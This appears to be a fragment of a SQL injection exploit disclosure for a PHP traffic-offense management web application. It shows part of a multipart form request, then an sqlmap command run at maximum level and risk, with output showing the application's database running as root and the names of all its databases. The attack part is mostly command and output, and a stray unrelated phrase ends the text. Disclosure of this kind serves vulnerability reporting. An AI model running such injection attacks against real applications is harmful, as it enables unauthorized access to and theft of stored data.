-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="total_amount"
1651
-----------------------------7900788429998101281579901385
Content-Disposition: form-data; name="remarks"
Sample
-----------------------------7900788429998101281579901385--
[...]
# Dump user, used database, all databases on the server using sqlmap
C:\Users\Hubert\Desktop\sqlmapproject-sqlmap-24e3b6a>sqlmap.py --level=5 --risk=3 -r C:\Users\Hubert\Desktop\0day\sql2 --dbms=MySQL --current-user --current-db --dbs --batch
[...]
[06:06:23] [INFO] testing MySQL
[06:06:23] [INFO] confirming MySQL
[06:06:24] [WARNING] reflective value(s) found and filtering out
[06:06:24] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.48, PHP 7.4.23
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[06:06:24] [INFO] fetching current user
[06:06:24] [INFO] resumed: 'root@localhost'
current user: 'root@localhost'
[06:06:24] [INFO] fetching current database
[06:06:24] [INFO] retrieved: 'traffic_offense_db'
current database: 'traffic_offense_db'
[06:06:24] [INFO] fetching database names
[06:06:24] [INFO] retrieved: 'information_schema'
[06:06:24] [INFO] retrieved: 'mysql'
[06:06:24] [INFO] retrieved: 'performance_schema'
[06:06:24] [INFO] retrieved: 'phpmyadmin'
[06:06:24] [INFO] retrieved: 'test'
[06:06:24] [INFO] retrieved: 'test2'
[06:06:24] [INFO] retrieved: 'traffic_offense_db'
available databases [7]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[*] test2
[*] traffic_offense_db
[06:06:24] [INFO] fetched data logged to text files under 'C:\Users\Hubert\AppData\Local\sqlmap\output\localhost'
[*] ending @ 06:06:24 /2021-10-07/
体验盒子
